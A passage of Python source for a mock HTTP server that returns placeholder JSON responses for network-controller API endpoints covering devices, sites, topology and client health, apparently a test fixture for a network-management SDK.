response_content = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_c9809b6744f8a502(self):
return re.search(
self.DEVICES_c9809b6744f8a502_PATTERN,
self.path
)
def devices_registerdevicefor_wsa_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'macAddress': 'string', 'modelNumber': 'string', 'name': 'string', 'serialNumber': 'string', 'tenantId': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_b9855ad54ae98156(self):
return re.search(
self.DEVICES_b9855ad54ae98156_PATTERN,
self.path
)
def devices_update_devicerole_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_b7bcaa084e2b90d0(self):
return re.search(
self.DEVICES_b7bcaa084e2b90d0_PATTERN,
self.path
)
def devices_get_device_configforalldevices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'attributeInfo': {}, 'cdpNeighbors': 'string', 'healthMonitor': 'string', 'id': 'string', 'intfDescription': 'string', 'inventory': 'string', 'ipIntfBrief': 'string', 'macAddressTable': 'string', 'runningConfig': 'string', 'snmp': 'string', 'version': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_cd98780f4888a66d(self):
return re.search(
self.DEVICES_cd98780f4888a66d_PATTERN,
self.path
)
def devices_export_devicelist_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_cd8469e647caab0e(self):
return re.search(
self.DEVICES_cd8469e647caab0e_PATTERN,
self.path
)
def devices_get_interfaceby_ip_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_d0a4b88145aabb51(self):
return re.search(
self.DEVICES_d0a4b88145aabb51_PATTERN,
self.path
)
def devices_get_network_deviceby_ip_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_888f585c49b88441(self):
return re.search(
self.DEVICES_888f585c49b88441_PATTERN,
self.path
)
def devices_get_device_config_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_d888ab6d4d59a8c1(self):
return re.search(
self.DEVICES_d888ab6d4d59a8c1_PATTERN,
self.path
)
def devices_get_deviceby_serialnumber_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_f5947a4c439a8bf0(self):
return re.search(
self.DEVICES_f5947a4c439a8bf0_PATTERN,
self.path
)
def devices_getallinterfaces_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_8db939744649a782(self):
return re.search(
self.DEVICES_8db939744649a782_PATTERN,
self.path
)
def devices_get_modulecount_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_eb8249e34f69b0f1(self):
return re.search(
self.DEVICES_eb8249e34f69b0f1_PATTERN,
self.path
)
def devices_get_modules_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'assemblyNumber': 'string', 'assemblyRevision': 'string', 'attributeInfo': {}, 'containmentEntity': 'string', 'description': 'string', 'entityPhysicalIndex': 'string', 'id': 'string', 'isFieldReplaceable': 'UNKNOWN', 'isReportingAlarmsAllowed': 'UNKNOWN', 'manufacturer': 'string', 'moduleIndex': 0, 'name': 'string', 'operationalStateCode': 'string', 'partNumber': 'string', 'serialNumber': 'string', 'vendorEquipmentType': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_f6826a8e41bba242(self):
return re.search(
self.DEVICES_f6826a8e41bba242_PATTERN,
self.path
)
def devices_getwirelesslancontrollerdetailsby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'adminEnabledPorts': [0], 'apGroupName': 'string', 'deviceId': 'string', 'ethMacAddress': 'string', 'flexGroupName': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'lagModeEnabled': True, 'netconfEnabled': True, 'wirelessLicenseInfo': 'ADVANTAGE', 'wirelessPackageInstalled': True}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_aeb9eb67460b92df(self):
return re.search(
self.DEVICES_aeb9eb67460b92df_PATTERN,
self.path
)
def devices_sync_devices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_b888792d43baba46(self):
return re.search(
self.DEVICES_b888792d43baba46_PATTERN,
self.path
)
def devices_get_interfaceby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'adminStatus': 'string', 'className': 'string', 'description': 'string', 'deviceId': 'string', 'duplex': 'string', 'id': 'string', 'ifIndex': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceType': 'string', 'ipv4Address': 'string', 'ipv4Mask': 'string', 'isisSupport': 'string', 'lastUpdated': 'string', 'macAddress': 'string', 'mappedPhysicalInterfaceId': 'string', 'mappedPhysicalInterfaceName': 'string', 'mediaType': 'string', 'nativeVlanId': 'string', 'ospfSupport': 'string', 'pid': 'string', 'portMode': 'string', 'portName': 'string', 'portType': 'string', 'serialNo': 'string', 'series': 'string', 'speed': 'string', 'status': 'string', 'vlanId': 'string', 'voiceVlan': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_c3b3c9ef4e6b8a09(self):
return re.search(
self.DEVICES_c3b3c9ef4e6b8a09_PATTERN,
self.path
)
def devices_get_functional_capabilityfordevices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'attributeInfo': {}, 'deviceId': 'string', 'functionalCapability': [{'attributeInfo': {}, 'functionDetails': [{'attributeInfo': {}, 'id': 'string', 'propertyName': 'string', 'stringValue': 'string'}], 'functionName': 'string', 'functionOpState': 'UNKNOWN', 'id': 'string'}], 'id': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_89b2fb144f5bb09b(self):
return re.search(
self.DEVICES_89b2fb144f5bb09b_PATTERN,
self.path
)
def devices_get_device_detail_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'HALastResetReason': 'string', 'managementIpAddr': 'string', 'HAPrimaryPowerStatus': 'string', 'redundancyMode': 'string', 'communicationState': 'string', 'nwDeviceName': 'string', 'redundancyUnit': 'string', 'platformId': 'string', 'redundancyPeerState': 'string', 'nwDeviceId': 'string', 'redundancyState': 'string', 'nwDeviceRole': 'string', 'nwDeviceFamily': 'string', 'macAddress': 'string', 'collectionStatus': 'string', 'deviceSeries': 'string', 'osType': 'string', 'clientCount': 'string', 'HASecondaryPowerStatus': 'string', 'softwareVersion': 'string', 'nwDeviceType': 'string', 'overallHealth': 0, 'memoryScore': 0, 'cpuScore': 0, 'noiseScore': 0, 'utilizationScore': 0, 'airQualityScore': 0, 'interferenceScore': 0, 'wqeScore': 0, 'freeMbufScore': 0, 'packetPoolScore': 0, 'freeTimerScore': 0, 'memory': 'string', 'cpu': 'string', 'noise': 'string', 'utilization': 'string', 'airQuality': 'string', 'interference': 'string', 'wqe': 'string', 'freeMbuf': 'string', 'packetPool': 'string', 'freeTimer': 'string', 'location': 'string', 'timestamp': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_f49548c54be8a3e2(self):
return re.search(
self.DEVICES_f49548c54be8a3e2_PATTERN,
self.path
)
def devices_get_network_devicebypaginationrange_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'apManagerInterfaceIp': 'string', 'associatedWlcIp': 'string', 'bootDateTime': 'string', 'collectionInterval': 'string', 'collectionStatus': 'string', 'errorCode': 'string', 'errorDescription': 'string', 'family': 'string', 'hostname': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'interfaceCount': 'string', 'inventoryStatusDetail': 'string', 'lastUpdateTime': 'string', 'lastUpdated': 'string', 'lineCardCount': 'string', 'lineCardId': 'string', 'location': 'string', 'locationName': 'string', 'macAddress': 'string', 'managementIpAddress': 'string', 'memorySize': 'string', 'platformId': 'string', 'reachabilityFailureReason': 'string', 'reachabilityStatus': 'string', 'role': 'string', 'roleSource': 'string', 'serialNumber': 'string', 'series': 'string', 'snmpContact': 'string', 'snmpLocation': 'string', 'softwareType': 'string', 'softwareVersion': 'string', 'tagCount': 'string', 'tunnelUdpPort': 'string', 'type': 'string', 'upTime': 'string', 'waasDeviceMode': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_DEVICES_ffa748cc44e9a437(self):
return re.search(
self.DEVICES_ffa748cc44e9a437_PATTERN,
self.path
)
def devices_retrievesallnetworkdevices_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_17a82ac94cf99ab0(self):
return re.search(
self.SITES_17a82ac94cf99ab0_PATTERN,
self.path
)
def sites_get_site_health_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'siteName': 'string', 'siteId': 'string', 'parentSiteId': 'string', 'parentSiteName': 'string', 'siteType': 'string', 'latitude': {}, 'longitude': {}, 'healthyNetworkDevicePercentage': 'string', 'healthyClientsPercentage': 'string', 'clientHealthWired': 'string', 'clientHealthWireless': {}, 'numberOfClients': 'string', 'clientNumberOfIssues': {}, 'networkNumberOfIssues': {}, 'numberOfNetworkDevice': 'string', 'networkHealthAverage': {}, 'networkHealthAccess': 'string', 'networkHealthCore': 'string', 'networkHealthDistribution': 'string', 'networkHealthRouter': 'string', 'networkHealthWireless': {}, 'networkHealthOthers': {}, 'numberOfWiredClients': 'string', 'numberOfWirelessClients': {}, 'wiredGoodClients': 'string', 'wirelessGoodClients': {}, 'clientIssueCount': {}, 'overallGoodDevices': 'string', 'accessGoodCount': 'string', 'accessTotalCount': 'string', 'coreGoodCount': 'string', 'coreTotalCount': 'string', 'distributionGoodCount': 'string', 'distributionTotalCount': 'string', 'routerGoodCount': 'string', 'routerTotalCount': 'string', 'wirelessDeviceGoodCount': 'string', 'wirelessDeviceTotalCount': 'string', 'applicationHealth': {}, 'applicationGoodCount': {}, 'applicationTotalCount': {}, 'applicationBytesTotalCount': {}}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_33aab9b842388023(self):
return re.search(
self.SITES_33aab9b842388023_PATTERN,
self.path
)
def sites_update_site_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'result': 'string', 'response': {'endTime': 'string', 'version': 'string', 'startTime': 'string', 'progress': 'string', 'data': 'string', 'serviceType': 'string', 'operationIdList': ['string'], 'isError': 'string', 'rootId': 'string', 'instanceTenantId': 'string', 'id': 'string'}, 'status': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_23896b124bd8b9bf(self):
return re.search(
self.SITES_23896b124bd8b9bf_PATTERN,
self.path
)
def sites_create_site_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_209509d247599e19(self):
return re.search(
self.SITES_209509d247599e19_PATTERN,
self.path
)
def sites_get_site_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'status': 'string', 'response': [{'parentId': 'string', 'systemGroup': 'string', 'name': 'string', 'groupTypeList': ['string'], 'additionalInfo': [{}], 'groupHierarchy': 'string', 'groupNameHierarchy': 'string', 'instanceTenantId': 'string', 'id': 'string'}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_92acda91406aa050(self):
return re.search(
self.SITES_92acda91406aa050_PATTERN,
self.path
)
def sites_delete_site_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'status': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_d9bdb9034df99dba(self):
return re.search(
self.SITES_d9bdb9034df99dba_PATTERN,
self.path
)
def sites_get_site_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 'string', 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_eeb168eb41988e07(self):
return re.search(
self.SITES_eeb168eb41988e07_PATTERN,
self.path
)
def sites_assign_device_to_site_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITES_eba669054e08a60e(self):
return re.search(
self.SITES_eba669054e08a60e_PATTERN,
self.path
)
def sites_get_membership_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'site': {'response': {}, 'version': 'string'}, 'device': {'response': {}, 'version': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORKS_6284db4649aa8d31(self):
return re.search(
self.NETWORKS_6284db4649aa8d31_PATTERN,
self.path
)
def networks_get_vlandetails_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': ['string'], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORKS_9ba14a9e441b8a60(self):
return re.search(
self.NETWORKS_9ba14a9e441b8a60_PATTERN,
self.path
)
def networks_get_site_topology_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'sites': [{'displayName': 'string', 'groupNameHierarchy': 'string', 'id': 'string', 'latitude': 'string', 'locationAddress': 'string', 'locationCountry': 'string', 'locationType': 'string', 'longitude': 'string', 'name': 'string', 'parentId': 'string'}]}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORKS_b2b8cb91459aa58f(self):
return re.search(
self.NETWORKS_b2b8cb91459aa58f_PATTERN,
self.path
)
def networks_get_physical_topology_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'id': 'string', 'links': [{'additionalInfo': {}, 'endPortID': 'string', 'endPortIpv4Address': 'string', 'endPortIpv4Mask': 'string', 'endPortName': 'string', 'endPortSpeed': 'string', 'greyOut': True, 'id': 'string', 'linkStatus': 'string', 'source': 'string', 'startPortID': 'string', 'startPortIpv4Address': 'string', 'startPortIpv4Mask': 'string', 'startPortName': 'string', 'startPortSpeed': 'string', 'tag': 'string', 'target': 'string'}], 'nodes': [{'aclApplied': True, 'additionalInfo': {}, 'customParam': {'id': 'string', 'label': 'string', 'parentNodeId': 'string', 'x': 0, 'y': 0}, 'dataPathId': 'string', 'deviceType': 'string', 'family': 'string', 'fixed': True, 'greyOut': True, 'id': 'string', 'ip': 'string', 'label': 'string', 'networkType': 'string', 'nodeType': 'string', 'order': 0, 'osType': 'string', 'platformId': 'string', 'role': 'string', 'roleSource': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'upperNode': 'string', 'userId': 'string', 'vlanId': 'string', 'x': 0, 'y': 0}]}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORKS_b9b48ac8463a8aba(self):
return re.search(
self.NETWORKS_b9b48ac8463a8aba_PATTERN,
self.path
)
def networks_gettopologydetails_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'id': 'string', 'links': [{'additionalInfo': {}, 'endPortID': 'string', 'endPortIpv4Address': 'string', 'endPortIpv4Mask': 'string', 'endPortName': 'string', 'endPortSpeed': 'string', 'greyOut': True, 'id': 'string', 'linkStatus': 'string', 'source': 'string', 'startPortID': 'string', 'startPortIpv4Address': 'string', 'startPortIpv4Mask': 'string', 'startPortName': 'string', 'startPortSpeed': 'string', 'tag': 'string', 'target': 'string'}], 'nodes': [{'aclApplied': True, 'additionalInfo': {}, 'customParam': {'id': 'string', 'label': 'string', 'parentNodeId': 'string', 'x': 0, 'y': 0}, 'dataPathId': 'string', 'deviceType': 'string', 'family': 'string', 'fixed': True, 'greyOut': True, 'id': 'string', 'ip': 'string', 'label': 'string', 'networkType': 'string', 'nodeType': 'string', 'order': 0, 'osType': 'string', 'platformId': 'string', 'role': 'string', 'roleSource': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'upperNode': 'string', 'userId': 'string', 'vlanId': 'string', 'x': 0, 'y': 0}]}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORKS_c2b5fb764d888375(self):
return re.search(
self.NETWORKS_c2b5fb764d888375_PATTERN,
self.path
)
def networks_get_l3_topology_details_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'id': 'string', 'links': [{'additionalInfo': {}, 'endPortID': 'string', 'endPortIpv4Address': 'string', 'endPortIpv4Mask': 'string', 'endPortName': 'string', 'endPortSpeed': 'string', 'greyOut': True, 'id': 'string', 'linkStatus': 'string', 'source': 'string', 'startPortID': 'string', 'startPortIpv4Address': 'string', 'startPortIpv4Mask': 'string', 'startPortName': 'string', 'startPortSpeed': 'string', 'tag': 'string', 'target': 'string'}], 'nodes': [{'aclApplied': True, 'additionalInfo': {}, 'customParam': {'id': 'string', 'label': 'string', 'parentNodeId': 'string', 'x': 0, 'y': 0}, 'dataPathId': 'string', 'deviceType': 'string', 'family': 'string', 'fixed': True, 'greyOut': True, 'id': 'string', 'ip': 'string', 'label': 'string', 'networkType': 'string', 'nodeType': 'string', 'order': 0, 'osType': 'string', 'platformId': 'string', 'role': 'string', 'roleSource': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'upperNode': 'string', 'userId': 'string', 'vlanId': 'string', 'x': 0, 'y': 0}]}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORKS_ca91da84401abba1(self):
return re.search(
self.NETWORKS_ca91da84401abba1_PATTERN,
self.path
)
def networks_get_overall_network_health_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': [{'time': 'string', 'healthScore': 0, 'totalCount': 0, 'goodCount': 0, 'unmonCount': 0, 'fairCount': 0, 'badCount': 0, 'entity': {}, 'timeinMillis': 0}], 'measuredBy': 'string', 'latestMeasuredByEntity': {}, 'latestHealthScore': 0, 'monitoredDevices': 0, 'monitoredHealthyDevices': 0, 'monitoredUnHealthyDevices': 0, 'unMonitoredDevices': 0, 'healthDistirubution': [{'category': 'string', 'totalCount': 0, 'healthScore': 0, 'goodPercentage': 0, 'badPercentage': 0, 'fairPercentage': 0, 'unmonPercentage': 0, 'goodCount': 0, 'badCount': 0, 'fairCount': 0, 'unmonCount': 0, 'kpiMetrics': [{}]}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_CLIENTS_149aa93b4ddb80dd(self):
return re.search(
self.CLIENTS_149aa93b4ddb80dd_PATTERN,
self.path
)
def clients_get_overall_client_health_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'siteId': 'string', 'scoreDetail': [{'scoreCategory': {'scoreCategory': 'string', 'value': 'string'}, 'scoreValue': 0, 'clientCount': 0, 'clientUniqueCount': 0, 'starttime': 0, 'endtime': 0, 'scoreList': [{'scoreCategory': {'scoreCategory': 'string', 'value': 'string'}, 'scoreValue': 0, 'clientCount': 0, 'clientUniqueCount': 0, 'starttime': 0, 'endtime': 0, 'scoreList': [{'scoreCategory': {'scoreCategory': 'string', 'value': 'string'}, 'scoreValue': 0, 'clientCount': 0, 'clientUniqueCount': {}, 'starttime': 0, 'endtime': 0}]}]}]}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_CLIENTS_e2adba7943bab3e9(self):
return re.search(
self.CLIENTS_e2adba7943bab3e9_PATTERN,
self.path
)
def clients_get_client_detail_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'detail': {'id': 'string', 'connectionStatus': 'string', 'hostType': 'string', 'userId': {}, 'hostName': 'string', 'hostOs': {}, 'hostVersion': {}, 'subType': 'string', 'lastUpdated': 0, 'healthScore': [{'healthType': 'string', 'reason': 'string', 'score': 0}], 'hostMac': 'string', 'hostIpV4': 'string', 'hostIpV6': ['string'], 'authType': 'string', 'vlanId': 'string', 'vnid': 'string', 'ssid': 'string', 'frequency': 'string', 'channel': 'string', 'apGroup': {}, 'location': {}, 'clientConnection': 'string', 'connectedDevice': [{}], 'issueCount': 0, 'rssi': 'string', 'avgRssi': {}, 'snr': 'string', 'avgSnr': {}, 'dataRate': 'string', 'txBytes': 'string', 'rxBytes': 'string', 'dnsSuccess': {}, 'dnsFailure': {}, 'onboarding': {'averageRunDuration': {}, 'maxRunDuration': {}, 'averageAssocDuration': {}, 'maxAssocDuration': {}, 'averageAuthDuration': {}, 'maxAuthDuration': {}, 'averageDhcpDuration': {}, 'maxDhcpDuration': {}, 'aaaServerIp': 'string', 'dhcpServerIp': {}, 'authDoneTime': {}, 'assocDoneTime': {}, 'dhcpDoneTime': {}, 'assocRootcauseList': [{}], 'aaaRootcauseList': [{}], 'dhcpRootcauseList': [{}], 'otherRootcauseList': [{}]}, 'clientType': 'string', 'onboardingTime': {}, 'port': {}, 'iosCapable': True}, 'connectionInfo': {'hostType': 'string', 'nwDeviceName': 'string', 'nwDeviceMac': 'string', 'protocol': 'string', 'band': 'string', 'spatialStream': 'string', 'channel': 'string', 'channelWidth': 'string', 'wmm': 'string', 'uapsd': 'string', 'timestamp': 0}, 'topology': {'nodes': [{'role': 